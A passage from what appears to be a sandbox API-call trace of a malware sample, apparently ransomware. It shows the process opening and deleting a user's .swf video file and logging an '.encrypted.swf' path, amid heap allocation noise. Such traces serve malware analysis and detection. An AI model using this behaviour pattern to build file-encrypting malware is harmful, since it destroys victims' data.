hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.913] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0042.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.913] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.913] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\8y1trplfo1lpoj0q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0042.913] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.914] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.914] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.914] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.914] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.915] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.915] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpFilePart=0x0) returned 0x48 [0042.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ff2c10, ftCreationTime.dwHighDateTime=0x1d5ba65, ftLastAccessTime.dwLowDateTime=0x834c3d80, ftLastAccessTime.dwHighDateTime=0x1d5c341, ftLastWriteTime.dwLowDateTime=0x19496b20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x35ac, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="8Y1tRpLFO1LPoJ0Q.swf", cAlternateFileName="8Y1TRP~1.SWF")) returned 0x7c2100 [0042.915] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\8y1trplfo1lpoj0q.swf")) returned 1 [0042.916] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ff2c10, ftCreationTime.dwHighDateTime=0x1d5ba65, ftLastAccessTime.dwLowDateTime=0x834c3d80, ftLastAccessTime.dwHighDateTime=0x1d5c341, ftLastWriteTime.dwLowDateTime=0x19496b20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x35ac, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="8Y1tRpLFO1LPoJ0Q.swf", cAlternateFileName="8Y1TRP~1.SWF")) returned 0 [0042.916] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.917] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.917] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.917] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.918] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.918] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.918] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.918] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.918] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.919] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.919] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.919] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.919] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.920] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x35f6, lpOverlapped=0x0) returned 1 [0042.920] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x35f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.920] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.encrypted.swf\r\n", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0042.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x55) returned 0x794b90 [0042.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.encrypted.swf\r\n", cchWideChar=85, lpMultiByteStr=0x794b90, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 85 [0042.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0042.921] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x54, lpOverlapped=0x0) returned 1 [0042.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.921] CloseHandle (hObject=0x140) returned 1 [0042.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.924] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.924] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.925] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.925] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.925] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.925] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.926] PeekMessageW (in: 